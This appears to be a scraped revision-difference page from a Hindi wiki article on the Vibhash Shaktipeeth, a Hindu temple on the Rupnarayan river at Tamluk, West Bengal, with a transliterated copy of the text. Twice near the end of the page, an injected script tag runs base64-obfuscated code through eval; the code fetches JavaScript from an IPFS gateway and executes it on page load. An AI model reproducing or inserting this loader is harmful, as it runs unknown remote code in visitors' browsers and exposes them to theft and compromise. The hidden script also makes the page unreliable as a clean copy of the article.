Difference between revisions of "विभाष शक्तिपीठ"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('{{पुनरीक्षण}} '''विभाष शक्तिपीठ''' [[शक्तिपीठ|51 शक्तिपीठो...' के साथ नया पन्ना बनाया)
 
 
Line 1: Line 1:
{{पुनरीक्षण}}
 
 
'''विभाष शक्तिपीठ''' [[शक्तिपीठ|51 शक्तिपीठों]] में से एक है। [[हिन्दू धर्म]] के [[पुराण|पुराणों]] के अनुसार जहां-जहां [[सती]] के अंग के टुकड़े, धारण किए [[वस्त्र]] या [[आभूषण]] गिरे, वहां-वहां शक्तिपीठ अस्तित्व में आये। ये अत्यंत पावन [[तीर्थ स्थान|तीर्थस्थान]] कहलाये। ये तीर्थ पूरे भारतीय उपमहाद्वीप पर फैले हुए हैं। देवीपुराण में [[शक्तिपीठ|51 शक्तिपीठों]] का वर्णन है।
 
'''विभाष शक्तिपीठ''' [[शक्तिपीठ|51 शक्तिपीठों]] में से एक है। [[हिन्दू धर्म]] के [[पुराण|पुराणों]] के अनुसार जहां-जहां [[सती]] के अंग के टुकड़े, धारण किए [[वस्त्र]] या [[आभूषण]] गिरे, वहां-वहां शक्तिपीठ अस्तित्व में आये। ये अत्यंत पावन [[तीर्थ स्थान|तीर्थस्थान]] कहलाये। ये तीर्थ पूरे भारतीय उपमहाद्वीप पर फैले हुए हैं। देवीपुराण में [[शक्तिपीठ|51 शक्तिपीठों]] का वर्णन है।
  
[[पश्चिम बंगाल]] राज्य के मिदनापुर के ताम्रलुक ग्राम में रूपनारायण नदी के [[तट]] पर स्थित वर्गभीमा का विशाल मन्दिर ही विभाष शक्तिपीठ है, जो दक्षिण पूर्व रेलवे के कुड़ा स्टेशन से 24 किलोमीटर दूर है। यहाँ बाएँ टखने का निपात हुआ था। यहाँ की शक्ति 'कापालिनी', 'भीमरूपा' तथा भैरव हैं 'सर्वानंद'।
+
*[[पश्चिम बंगाल]] राज्य के मिदनापुर के ताम्रलुक ग्राम में [[रूपनारायण नदी]] के [[तट]] पर स्थित वर्गभीमा का विशाल मन्दिर ही विभाष शक्तिपीठ है, जो दक्षिण पूर्व रेलवे के कुड़ा स्टेशन से 24 किलोमीटर दूर है।
 +
*इस स्थान पर [[सती]] के बाएँ टखने का निपात हुआ था। यहाँ की शक्ति 'कापालिनी', 'भीमरूपा' तथा भैरव हैं 'सर्वानंद'।
  
  
Line 8: Line 8:
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
==बाहरी कड़ियाँ==
 
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{शक्तिपीठ}}
 
{{शक्तिपीठ}}

Latest revision as of 11:17, 14 September 2014

vibhash shaktipith 51 shaktipithoan mean se ek hai. hindoo dharm ke puranoan ke anusar jahaan-jahaan sati ke aang ke tuk de, dharan kie vastr ya abhooshan gire, vahaan-vahaan shaktipith astitv mean aye. ye atyant pavan tirthasthan kahalaye. ye tirth poore bharatiy upamahadvip par phaile hue haian. devipuran mean 51 shaktipithoan ka varnan hai.

  • pashchim bangal rajy ke midanapur ke tamraluk gram mean roopanarayan nadi ke tat par sthit vargabhima ka vishal mandir hi vibhash shaktipith hai, jo dakshin poorv relave ke ku da steshan se 24 kilomitar door hai.
  • is sthan par sati ke baean takhane ka nipat hua tha. yahaan ki shakti 'kapalini', 'bhimaroopa' tatha bhairav haian 'sarvanand'.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>